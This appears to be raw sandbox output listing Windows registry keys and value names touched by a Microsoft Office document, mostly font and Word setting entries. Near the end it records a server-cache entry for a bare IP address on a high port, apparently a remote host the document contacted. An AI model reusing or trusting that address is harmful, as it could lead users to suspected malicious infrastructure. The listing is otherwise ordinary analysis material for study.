HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Yu Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic UI Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic UI Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
HoloLens MDL2 Assets
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Forte
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MT Extra
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DengXian
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DengXian
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\290BE
290BE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutosaveInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Malgun Gothic Semilight
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft JhengHei Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft JhengHei UI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft JhengHei UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft YaHei Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft YaHei UI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft YaHei UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic UI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic UI Semilight
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\290BE
290BE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
=j;
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
>j;
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
j74
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
k74
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
MSComctlLib
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
VBAFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
z)1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
1*1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
`-1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://101.33.231.81:62563/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Batang
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Latha
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vani
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shonar Bangla
